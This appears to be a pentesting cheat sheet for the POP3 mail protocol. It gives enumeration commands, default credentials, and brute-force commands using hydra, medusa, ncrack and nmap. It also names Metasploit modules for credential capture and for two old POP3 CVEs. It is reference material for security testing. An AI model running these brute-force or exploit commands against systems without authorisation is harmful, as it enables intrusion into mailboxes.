POP3
POP3 usually uses ports 110, 995
What is POP3?
POP3 stands for Post Office Protocol. As the name suggests, it allows you to use your email inbox like a post office – emails are downloaded onto your computer and removed from the mail server.
When accessing your emails using the POP3 protocol, a copy of the emails is created and stored locally on your computer. The originals are usually, but not always, removed from the mail server. In other words, emails are tied to the specific device. Once the email is downloaded onto one device (and removed from the mail server), it cannot be accessed by another email client or device.
1
2
| PORT STATE SERVICE VERSION
110/tcp open pop3 Zimbra Collabration Suite pop3d
|
POP3 Pentesting
![https://www.shodan.io/static/img/favicon.png]() Shodan search query : |
|---|
port:110, 995 |
Enumeration
Banner Grabbing
1
2
3
4
5
6
| telnet 10.10.x.x 110
nc -nv 10.10.x.x 110
nmap -p110 --script=banner 10.10.x.x
nmap -p110 --script=pop3-ntlm-info 10.10.x.x
msf > use auxiliary/scanner/pop3/pop3_version #MetasploitFramework
openssl s_client -connect <IP>:995 -crlf -quiet
|
![Untitled]()
Capabilities
1
2
3
4
| #All are default scripts
nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port 110 192.168.x.x
# Retrieve POP3 server capabilities (CAPA, TOP, USER, SASL, RESP-CODES, LOGIN-DELAY, PIPELINING, EXPIRE, UIDL, IMPLEMENTATION)
nmap -v -sV --version-intensity=5 --script pop3-capabilities -p T:110 192.168.x.x
|
![Untitled]()
![Untitled]()
The pop3-ntlm-info plugin will return some “sensitive” data (Windows versions).
POP3 Commands
1
2
3
4
5
6
7
8
9
10
11
| POP commands:
USER uid Log in as "uid"
PASS password Substitue "password" for your actual password
STAT List number of messages, total mailbox size
LIST List messages and sizes
RETR n Show message n
DELE n Mark message n for deletion
RSET Undo any changes
QUIT Logout (expunges messages if no RSET)
TOP msg n Show first n lines of message number msg
CAPA Get capabilities
|
Capturing POP3 Packages
1
| msf > use auxiliary/server/capture/pop3 #MetasploitFramework
|
POP3 Credentials
Authentication Checking (classical credentials)
| USER | PASS |
|---|
| admin | admin |
| root | root |
| root | toor |
Brute Forcing
1
2
3
4
5
6
7
8
9
10
11
12
| hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
hydra -t 2 -L users.list -P passwords.list -M 10.10.x.x.list -s 110 pop3
# Try to bruteforce POP3 accounts
Nmap: pop3-brute –script-args userdb=users.list,passdb=passwords.list
nmap --script pop3-brute --script-args pop3loginmethod=SASL-LOGIN -p T:110 IP
nmap --script pop3-brute --script-args pop3loginmethod=SASL-CRAM-MD5 -p T:110 IP
nmap --script pop3-brute --script-args pop3loginmethod=APOP -p T:110 IP
msf > use auxiliary/scanner/pop3/pop3_login #MetasploitFramework
medusa -t 2 -T 2 -U users.list -P passwords.list -H 10.10.x.x.list -n 110 -M pop3
ncrack -g CL=2 -U users.list -P passwords.list -iL 10.10.x.x.list -p pop3:110 -oA output
patator pop3_login host=10.10.x.x user=FILE1 password=FILE0 0=users.list 1=passwords.list -x ignore:fgrep=’incorrect password or account name’
|
POP3 Vulnerabilities
1
2
3
4
5
| #Seattle Lab Mail 5.5 [CVE-2003-0264]
msf > use exploit/windows/pop3/seattlelab_pass #MetasploitFramework
Exploit-DB: 638.py, 643.c, 646.c
#Cyrus – Gentoo 2006.0 Linux 2.6 [CVE-2006-2502]
msf > use exploit/linux/pop3/cyrus_pop3d_popsubfolders #MetasploitFramework
|
Shodan search query :
Comments powered by Disqus.